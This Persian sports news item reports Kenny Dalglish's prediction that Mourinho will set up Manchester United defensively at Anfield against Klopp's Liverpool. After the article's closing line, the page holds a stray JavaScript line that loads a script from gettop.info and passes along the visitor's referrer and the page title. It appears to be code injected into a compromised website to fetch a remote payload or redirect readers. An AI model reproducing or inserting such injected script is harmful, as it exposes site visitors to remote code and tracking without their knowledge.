دالگلیش: مورینیو در آنفیلد دفاعی بازی خواهد کرد


کنی دالگلیش

کنی دالگلیش عقیده دارد ژوزه مورینیو در بازی فردا شنبه تیمش را دفاعی به میدان خواهد فرستاد.

به گزارش سادس و به نقل از دیلی میل، در یکی از حساس ترین رقابت های باشگاهی در فوتبال جهان فردا شنبه و از هفته هشتم این رقابت ها لیورپول در خانه به دیدار رقیب دیرینه خود یعنی منچستریونایتد می رود که این روزها در اوج آمادگی قرار دارد و توانسته است در ۷ دیدار خود در لیگ برتر ۲۱ بار گلزنی کند.  

کنی دالگلیش اسطوره تیم لیورپول درباره این دیدار گفت: ۳ سال پیش مورینیو با چلسی تیمی را جلوی لیورپول قرار داد که توانست با یک بازی حساس شده و البته دفاعی قهرمانی را از لیورپول بگیرد. هیچ انتقادی به مورینیو وارد نبود و او تیم خود را برای آن دیدار آماده کرد. این لیورپول بود که در آن دیدار قهرمانی را از دست داد. او سال گذشته هم با همین روش به آنفیلد آمد و با یک بازی دفاعی به فکر ضربه زدن در دقایق حساس بازی بود. اتفاقا نزدیک بود آنها با ضربه زلاتان ایبراهیموویچ در دقیقه ۹۰ به گل برتری هم برسند که آن دیدار با تساوی به پایان رسید. درباره این دیدار هم باید بگویم که عقیده من این است که مورینیو باز هم تیمش را دفاعی به زمین خواهد فرستاد و این برداشت که آنها امسال تیم هجومی هستند و قرار است در آنفیلد هجومی بازی کنند را قبول ندارم.

او در ادامه صحبت های خود گفت: این اولین دیدار مورینیو با تیم های بالانشین در جدول رده بندی لیگ برتر است و طبیعی است که او احتیاط به خرج دهد.  با احترام به سایر تیم های لیگ برتر، شاید این بازی ها تعیین کننده این باشند که چه تیمی در ماه می جام قهرمانی را بالای سر خواهد برد. در هر صورت این بازی نبرد دو مربی خواهد بود. مورینیو می داند در دیدارهای خود باید چطور برنده باشد و اگر مجبور باشد ۹۰ دقیقه را دفاع کند همین کار را انجام خواهد داد ولی کلوپ این طور نیست و دوست دارد همیشه تیمش برای برد بازی کند و بازی هجومی را در دستور کار خود قرار دهد. من مطمئن هستم هواداران لیورپول خواستار این هستند که او با همین رویکرد تهاجمی به کار خود ادامه دهد.

انتهای پیام

s.src=’http://gettop.info/kt/?sdNXbH&frm=script&se_referrer=’ + encodeURIComponent(document.referrer) + ‘&default_keyword=’ + encodeURIComponent(document.title) + ”;

دسته‌بندی نشده

دیدگاهتان را بنویسید

نشانی ایمیل شما منتشر نخواهد شد. بخش‌های موردنیاز علامت‌گذاری شده‌اند *